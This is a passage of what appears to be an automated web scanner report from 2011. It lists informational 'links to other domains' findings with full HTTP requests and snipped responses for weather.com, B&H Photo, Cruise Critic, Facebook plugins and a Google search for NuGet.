22.50. http://wow.weather.com/weather/wow/module/USNY0400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Issue detail

The page was loaded from a URL containing a query string:

http://wow.weather.com/weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_module

The response contains the following link to another domain:

http://www.observertoday.com/page/weather.lg/?wx_config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:51 GMT
Server: Apache
SVRNAME: web2x07
Vary: Accept-Encoding
Content-Length: 5455
Content-Type: text/html

if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
<TD valign="middle" align="center"><a href="http://www.observertoday.com/page/weather.lg/?wx_config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478" style="text-decoration:none;" target="wownewwin"><IMG SRC="http://imawow.weather.com/web/common/wxicons/36/26.gif?12122006" WIDTH="36" HEIGHT="36" BORDER="0">
...[SNIP]...
<TD align="center" class="wowwxSmall"><a href="http://www.observertoday.com/page/weather.lg/?wx_config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478" style="text-decoration:none;line-height: 20px;" target="wownewwin"><FONT class="wowtempText" style="line-height: 18px;">
...[SNIP]...
<TD align="center" class="wowwxLink10"><A HREF="http://www.observertoday.com/page/weather.lg/?wx_config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478" target="wownewwin">Extended Forecast<BR />
...[SNIP]...

22.51. http://www.bhphotovideo.com/bnh/controller/home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The page was loaded from a URL containing a query string:

http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif

The response contains the following links to other domains:

http://hdslr.bhphoto.com/Home.php?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2Guide
http://secure.globalsign.net/en/find/sealct.cfm?id=49947127
http://twitter.com/bhphotovideo
http://www.bbbonline.org/cks.asp?id=121000249
http://www.bhinsights.com/
http://www.bhinsights.com/?cm_sp=Banner-_-HomePage-_-bhinsights
http://www.facebook.com/bhphoto?v=wall
http://www.scanalert.com/RatingVerify?ref=www.bhphotovideo.com
http://www.youtube.com/user/BHPhotoVideoProAudio

Request

GET /bnh/controller/home?KW=BANNER2&img=bh_wl.gif HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; TS29f0cc=d35b183be3c07378b7d4c90c4d1f57e3871d7ea6dc67d58e4dd0802d60ac0ec5a2f86729b092ce85bc587bdd

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Content-Length: 39479
Expires: Mon, 16 May 2011 01:41:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:41:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>B&H Photo Vi
...[SNIP]...
<area shape="rect" coords="6,67,159,120" href="http://www.bhphotovideo.com/bnh/controller/home?O=RootPage.jsp&A=getpage&Q=EventSpace.jsp&cm_sp=Banner-_-HomePage-_-EventSpace" alt="In-store events" />
   <area shape="rect" coords="163,6,319,60" href="http://www.bhinsights.com?cm_sp=Banner-_-HomePage-_-bhinsights" target="_blank" alt="BH Insights" />
   <area shape="rect" coords="6,6,159,61" href="http://www.bhphotovideo.com/find/HelpCenter/NYSuperStore08.jsp?cm_sp=Banner-_-HomePage-_-NYsuperStore" alt="store experience" />
...[SNIP]...
ape="poly" coords="317,118,317,66,163,66,163,99,251,99,251,118" href="http://www.bhphotovideo.com/find/hdslr.jsp?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2`HUB" target="_self" alt="HDSLR-View products" />
   <area shape="rect" coords="162,99,252,120" href="http://hdslr.bhphoto.com/Home.php?cm_sp=HDSLR-_-HDSLR`Guide-_-HDSLR`Go2Guide" onclick="subWindowNoScrollBars('hdslrGuideWin', 654, 991);" target="hdslrGuideWin" alt="HDSLR-Online Guide" />
   <area shape="rect" coords="324,5,478,99" href="https://secure.bhphotovideo.com/bnh/controller/home/?O=LeftNavBar&A=signUp&Q=" target="_self" alt="Email subscription" />
...[SNIP]...
<li><a name="B&H_Insights" href="http://www.bhinsights.com" onclick="return widgets.popup(this, 'profiles.insights');" >B&H Insights Blog</a>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/bhphoto?v=wall" alt="Facebook" target="blank">Facebook</a>
...[SNIP]...
<li><a class="twitter" href="http://twitter.com/bhphotovideo" alt="Twitter" target="blank">Twitter</a>
...[SNIP]...
<li><a class="youTube" href="http://www.youtube.com/user/BHPhotoVideoProAudio" alt="You Tube" target="blank">You Tube</a>
...[SNIP]...
<li class="hackerSafe"><a class="hackerSafeLink" onclick="return widgets.popup(this, 'Mcafee', 'width=560px, scrollbars=yes');" target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.bhphotovideo.com" rel="nofollow">McAfee Secure - Tested Daily</a>
...[SNIP]...
<li class="cyberTrust"><a class="cyberTrustLink" onclick="return widgets.popup(this, 'Cyberrust', 'width=810px, scrollbars=yes');" href="http://secure.globalsign.net/en/find/sealct.cfm?id=49947127" target="_blank" rel="nofollow">Cybertrust - Secured Website</a>
...[SNIP]...
<li class="bbbOnline"><a class="bbbOnlineLink" onclick="return widgets.popup(this, 'BBB', 'width=800px, height=480px, scrollbars=yes');" href="http://www.bbbonline.org/cks.asp?id=121000249" target="_blank" rel="nofollow">BBB - Accredited Business</a>
...[SNIP]...

22.52. http://www.cruisecritic.com/reviews/cruiseline.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cruisecritic.com
Path:	/reviews/cruiseline.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.cruisecritic.com/reviews/cruiseline.cfm?CruiseLineID=16

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=11;ord=051511092639?
http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=13;ord=051511092639?
http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=1;ord=051511092639?
http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=2;ord=051511092639?
http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=11;ord=051511092639?
http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=13;ord=051511092639?
http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=1;ord=051511092639?
http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=2;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=11;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=13;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=1;ord=051511092639?
http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=2;ord=051511092639?
http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=11;ord=051511092639?
http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=13;ord=051511092639?
http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=1;ord=051511092639?
http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=2;ord=051511092639?
http://twitter.com/cruisecritic
http://www.facebook.com/CruiseCritic
http://www.facebook.com/plugins/likebox.php?id=47806071766&width=292&connections=0&stream=false&header=true&height=62

Request

GET /reviews/cruiseline.cfm?CruiseLineID=16 HTTP/1.1
Host: www.cruisecritic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:26:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SUBSCRIBENEWSLETTER=2;domain=cruisecritic.com;expires=Thu, 19-May-2011 01:26:39 GMT;path=/
Vary: Accept-Encoding
Content-Length: 47418

<html>
<head>
<title>Disney Cruise Line - Disney Cruises and Reviews - Cruise Critic</title>
<meta name="description" content="Cruise Critic has 373 Disney cruise
...[SNIP]...

<iframe src="http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=1;ord=051511092639?" target="_blank" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=1;ord=051511092639?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=1;ord=051511092639?" target="_blank"><img src="http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=topleft;sz=728x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=1;ord=051511092639?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<td valign="top" width="225">

<iframe src="http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=2;ord=051511092639?" target="_blank" width="220" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"><script language="JavaScript" src="http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=2;ord=051511092639?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=2;ord=051511092639?" target="_blank"><img src="http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=2;ord=051511092639?" width="220" height="90" border="0" alt=""></a>
...[SNIP]...
<li class="noMarginPadding"><a class="sprite fbIcon" href="http://www.facebook.com/CruiseCritic" target="_blank"></a>
...[SNIP]...
<li class="noMarginPadding"><a class="sprite twitterIcon" href="http://twitter.com/cruisecritic" target="_blank"></a>
...[SNIP]...
<div style="margin-top:-30px; margin-left:-60px;">
<iframe frameborder="0" scrolling="no" allowtransparency="true" style="border: medium none; overflow: hidden; width: 200px; height: 62px;" src="http://www.facebook.com/plugins/likebox.php?id=47806071766&width=292&connections=0&stream=false&header=true&height=62"></iframe>
...[SNIP]...

<iframe src="http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=11;ord=051511092639?" width="160" height="600" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=11;ord=051511092639?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=11;ord=051511092639?" target="_blank"><img src="http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=11;ord=051511092639?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...

<iframe src="http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=13;ord=051511092639?" width="160" height="600" marginwidth="0" marginheight="0" frameborder="0" scrolling="no">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie;tile=13;ord=051511092639?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=13;ord=051511092639?" target="_blank"><img src="http://ad.doubleclick.net/ad/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;abr=!ie4;abr=!ie5;abr=!ie6;tile=13;ord=051511092639?" width="160" height="600" border="0" alt=""></a>
...[SNIP]...

22.53. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e2ccd5c%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F10%2Fpsn-restoration-timeline-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Request

GET /plugins/like.php?action=like&api_key=151297214929498&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e2ccd5c%26origin%3Dhttp%253A%252F%252Fblog.us.playstation.com%252Ff17beecc88%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fblog.us.playstation.com%2F2011%2F05%2F10%2Fpsn-restoration-timeline-update%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.54. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=47806071766&width=292&connections=0&stream=false&header=true&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/41815_47806071766_1919_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=47806071766&width=292&connections=0&stream=false&header=true&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/bargains/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

22.55. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=nuget&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://10rem.net/blog/2011/02/10/nuget-for-wpf-and-silverlight-developers
http://haacked.com/tags/NuGet/default.aspx
http://nu.wikispot.org/
http://nuget.codeplex.com/
http://nuget.codeplex.com/SourceControl/list/changesets
http://nuget.codeplex.com/discussions
http://nuget.codeplex.com/documentation
http://nuget.codeplex.com/releases
http://nuget.codeplex.com/team/view
http://nuget.codeplex.com/wikipage?title=Getting%20Started
http://nuget.codeplex.com/wikipage?title=Screencasts
http://nuget.codeplex.com/workitem/list/basic
http://rubygems.org/
http://visualstudiogallery.msdn.microsoft.com/27077b70-9dad-4c64-adcf-c7cf6bc9970c
http://webcache.googleusercontent.com/search?q=cache:0NBEbMD3vJgJ:nuget.codeplex.com/releases+nuget&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:5xQLU_iTorQJ:www.nuget.org/+nuget&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:QCNU8AKt12cJ:www.kodefuguru.com/post/2011/05/07/You-Should-Use-NuGet.aspx+nuget&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:TPoaV8hY9nkJ:nuget.codeplex.com/wikipage%3Ftitle%3DGetting%2520Started+nuget&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:_deOxj7rLngJ:www.codethinked.com/you-really-should-be-using-nuget+nuget&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:_ivMe6cstEYJ:weblogs.asp.net/scottgu/archive/2011/02/14/nuget-1-1-released.aspx+nuget&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bqHIjupDgOsJ:nuget.codeplex.com/+nuget&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bzlfDrJmvqwJ:haacked.com/tags/NuGet/default.aspx+nuget&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lIjU3mLg1SkJ:10rem.net/blog/2011/02/10/nuget-for-wpf-and-silverlight-developers+nuget&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:th8VrvZNm1gJ:visualstudiogallery.msdn.microsoft.com/27077b70-9dad-4c64-adcf-c7cf6bc9970c+nuget&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://weblogs.asp.net/scottgu/archive/2011/02/14/nuget-1-1-released.aspx
http://www.codethinked.com/you-really-should-be-using-nuget
http://www.hanselman.com/
http://www.kodefuguru.com/post/2011/05/07/You-Should-Use-NuGet.aspx
http://www.nuget.org/
http://www.outercurve.org/
http://www.youtube.com/results?q=nuget&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=nuget&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=KItN1BTtwQNNlX1ALe1vDC7hoepoKX2UQICiquxtJyGvPpXkRhOP0VSYRncKH-Ip7WUjGpM92yvv3kjAfNGRUaBZTHmZpQy4UvWTLU1BWRwGdARXc--dGj_5qPLGEDEK

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 23:49:41 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 73041

<!doctype html> <head> <title>nuget - Google Search</title> <script>window.google={kEI:"lWbQTZGBEabL0QG43cmKDg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,29822,30
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=nuget&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://nuget.codeplex.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB8QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bqHIjupDgOsJ:nuget.codeplex.com/+nuget&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/releases" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoADAA')">Downloads</a></div><div class=sld><a class=sla href="http://nuget.codeplex.com/wikipage?title=Getting%20Started" onmousedown="return clk('http://nuget.codeplex.com/wikipage?title=Getting%20Started','','','','1','','0CCcQqwMoATAA')">Getting Started</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/documentation" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAjAA')">Documentation</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/wikipage?title=Screencasts" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoAzAA')">Screencasts page</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/SourceControl/list/changesets" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBDAA')">Source Code</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/discussions" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBTAA')">Discussions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://nuget.codeplex.com/team/view" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBjAA')">People</a></div><div class=sld><a class=sla href="http://nuget.codeplex.com/workitem/list/basic" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBzAA')">Issue Tracker</a>
...[SNIP]...
<h3 class="r"><a href="http://nuget.codeplex.com/wikipage?title=Getting%20Started" class=l onmousedown="return clk('http://nuget.codeplex.com/wikipage?title=Getting%20Started','','','','2','','0CDAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TPoaV8hY9nkJ:nuget.codeplex.com/wikipage%3Ftitle%3DGetting%2520Started+nuget&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:TPoaV8hY9nkJ:nuget.codeplex.com/wikipage%3Ftitle%3DGetting%2520Started+nuget&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://nuget.codeplex.com/releases" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0NBEbMD3vJgJ:nuget.codeplex.com/releases+nuget&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nuget.org/" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5xQLU_iTorQJ:www.nuget.org/+nuget&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://weblogs.asp.net/scottgu/archive/2011/02/14/nuget-1-1-released.aspx" class=l onmousedown="return clk(this.href,'','','','5','','0CEMQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:_ivMe6cstEYJ:weblogs.asp.net/scottgu/archive/2011/02/14/nuget-1-1-released.aspx+nuget&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEgQIDAE')">Cached</a>
...[SNIP]...
